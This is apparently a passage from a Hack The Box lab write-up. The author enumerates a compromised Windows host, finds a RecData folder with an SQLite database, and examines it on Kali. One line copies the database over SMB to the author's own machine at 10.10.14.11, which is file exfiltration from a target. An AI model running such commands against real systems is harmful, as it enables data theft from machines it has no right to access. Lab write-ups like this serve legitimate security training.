Recording Data
ps c:\> ls
directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/28/2022 6:02 PM inetpub
d----- 9/15/2018 12:19 AM PerfLogs
d-r--- 2/28/2022 6:55 PM Program Files
d----- 2/28/2022 6:07 PM Program Files (x86)
d----- 2/28/2022 7:02 PM RecData
d----- 2/28/2022 6:35 PM Shared
d----- 1/30/2023 2:02 AM tmp
d-r--- 2/28/2022 7:04 PM Users
d----- 2/28/2022 6:02 PM Windows
ps c:\> cd .\RecData\ ; ls
directory: C:\RecData
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2022 7:02 PM 8192 RecordInfoDB.db3
-a---- 2/28/2022 7:02 PM 0 RecordInfoDB.db3-journalI found an interesting directory at the system root after making some basic enumeration
it has a database file in it; c:\RecData\RecordInfoDB.db3
RecordInfoDB.db3
PS C:\RecData> copy .\RecordInfoDB.db3 \\10.10.14.11\smb\RecordInfoDB.db3 I transferred the DB file to Kali over SMB for further examination
┌──(kali㉿kali)-[~/archive/htb/labs/servmon]
└─$ file RecordInfoDB.db3
RecordInfoDB.db3: SQLite 3.x database, last written using SQLite version 3007011, page size 1024, file counter 3, database pages 8, cookie 0x3, schema 4, UTF-8, version-valid-for 3
I can’t tell what this DB is exactly used for. It is empty though.
It sure appears to be storing recording data.